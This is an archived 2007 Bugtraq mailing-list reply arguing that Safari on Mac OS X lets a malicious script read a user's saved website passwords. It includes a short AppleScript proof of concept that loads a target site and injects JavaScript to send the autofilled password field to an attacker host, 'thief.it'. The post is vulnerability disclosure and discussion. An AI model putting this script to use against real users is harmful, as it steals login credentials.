lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 14 May 2007 22:35:00 -0000
From: poplix@...uasia.org
To: bugtraq@...urityfocus.com
Subject: Re: RE: Apple Safari on MacOSX may reveal user's saved passwords

Mark, you read it correctly and you're right, anyway a malicious user at your console should not be able to read your passwords. Also note that to steal saved passwords it's sufficent to entice a victim to execute a malicious script like that:

--BOF
tell application "Safari"
	open location "https://www.target.com"
end tell

do shell script "/bin/sleep 10"

tell application "Safari"
	do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1
end tell
--EOF

I agree with you in saying that the execution of malicious scripts can lead in much more dangeruos attacks, anyway i consider this a vulnerability and i dont know why Apple belives this is the correct behaviour. . .

many thanks for your comment

-p

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ